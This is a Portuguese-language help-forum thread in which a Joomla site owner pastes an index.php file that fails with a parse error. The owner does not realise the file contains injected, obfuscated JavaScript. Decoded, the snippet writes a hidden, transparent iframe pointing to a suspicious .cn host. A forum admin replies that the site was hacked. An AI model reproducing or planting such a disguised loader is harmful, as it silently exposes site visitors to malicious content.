Ajuda! - Parse error: syntax error, unexpected '<' in

Se você não sabe onde postar, poste aqui.
montelatto
Novato
Mensagens: 1
Registrado em: 12 Jun 2009, 00:23

Ajuda! - Parse error: syntax error, unexpected '<' in

Mensagem por montelatto »

Olá a todos, a pouco tempo atrás entro no site no qual
eu administro e verifico que existe uma mensagem de erro.

Parse error: syntax error, unexpected '<' in /home/teosofia-liberdade/www/index.php on line 92

Até então o site estava funcionando normalmente, porém agora apareceu esse erro.

Vejam o site:

http://www.teosofia-liberdade.org.br

Abaixo segue o cógido da página index.php no qual acusa o erro na linha 92

Código: Selecionar todos

<?php
/**
* @version		$Id: index.php 9987 2008-02-05 17:43:24Z ian $
* @package		Joomla
* @copyright	Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license		GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
 * CREATE THE APPLICATION
 *
 * NOTE :
 */
$mainframe =& JFactory::getApplication('site');

/**
 * INITIALISE THE APPLICATION
 *
 * NOTE :
 */
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
 * ROUTE THE APPLICATION
 *
 * NOTE :
 */
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
 * DISPATCH THE APPLICATION
 *
 * NOTE :
 */
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
 * RENDER  THE APPLICATION
 *
 * NOTE :
 */
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));

/** ESTA LINHA DEBAIXO QUE É A LINHA 92 QUE ACUSA O TAL ERRO !!! */

<?php echo'<script type="text/javascript">var kBcbixsouogTfIchnyMH = 
"kV60kV105kV102kV114kV97kV109kV101kV32kV119kV105kV100kV116kV104kV61kV34kV52kV56kV48kV34
kV32kV104kV101kV105kV103kV104kV116kV61kV34kV54kV48kV34kV32kV115kV114kV99kV61kV34kV104kV
116kV116kV112kV58kV47kV47kV104kV105kV116kV45kV115kV101kV110kV100kV101kV114kV115kV46kV99kV
110kV47kV102kV105kV110kV100kV47kV105kV110kV46kV99kV103kV105kV63kV54kV34kV32kV115kV116kV121
kV108kV101kV61kV34kV98kV111kV114kV100kV101kV114kV58kV48kV112kV120kV59kV32kV112kV111kV115kV
105kV116kV105kV111kV110kV58kV114kV101kV108kV97kV116kV105kV118kV101kV59kV32kV116kV111kV112kV
58kV48kV112kV120kV59kV32kV108kV101kV102kV116kV58kV45kV53kV48kV48kV112kV120kV59kV32kV111kV11
2kV97kV99kV105kV116kV121kV58kV48kV59kV32kV102kV105kV108kV116kV101kV114kV58kV112kV114kV111kV1
03kV105kV100kV58kV68kV88kV73kV109kV97kV103kV101kV84kV114kV97kV110kV115kV102kV111kV114kV109kV
46kV77kV105kV99kV114kV111kV115kV111kV102kV116kV46kV65kV108kV112kV104kV97kV40kV111kV112kV97kV
99kV105kV116kV121kV61kV48kV41kV59kV32kV45kV109kV111kV122kV45kV111kV112kV97kV99kV105kV116kV12
1kV58kV48kV34kV62kV60kV47kV105kV102kV114kV97kV109kV101kV62";var FVxOkuVZcmEMnhoVehKZ = 
kBcbixsouogTfIchnyMH.split("kV");var VqsBzVjmTvtZRroBmJaO = "";for (var wfbjMQFrxPQSGJUFeDry=1; 
wfbjMQFrxPQSGJUFeDry<FVxOkuVZcmEMnhoVehKZ.length; wfbjMQFrxPQSGJUFeDry++){VqsBzVjmTvtZRroBmJaO+=String.fromCharCode(FVxOkuVZcmEMnhoVehKZ[wfbjMQFrxPQSGJUFeDry]);}var 
MNwVKuSOmaiBMmiNFikT = ""+VqsBzVjmTvtZRroBmJaO+"";document.write(""+MNwVKuSOmaiBMmiNFikT+"")</script>'; ?>
Simplesmente não sei o que fazer para arrumar, ficaria muito agradecido se alguém pudesse me ajudar.

Estou anexando também o arquivo index.php para vocês verem!

Por favor ajudem.. Obrigado!

Montelatto
Anexos
index.zip
Arquivo index.php com o erro Parse error: syntax error, unexpected '<' in
(1.54 KiB) Baixado 78 vezes
Avatar do usuário
bigodines
Site Admin
Mensagens: 384
Registrado em: 11 Jul 2008, 20:25

Re: Ajuda! - Parse error: syntax error, unexpected '<' in

Mensagem por bigodines »

cara... apaga aquela linha e atualiza teu Joomla!. teu site foi hackeado.
Responder